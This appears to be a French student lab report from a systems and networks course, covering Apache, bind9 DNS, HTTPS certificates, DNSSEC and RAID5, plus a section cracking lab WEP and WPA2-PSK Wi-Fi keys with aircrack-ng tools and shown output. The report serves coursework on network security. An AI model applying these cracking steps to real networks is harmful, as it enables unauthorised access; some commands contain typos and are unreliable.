Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
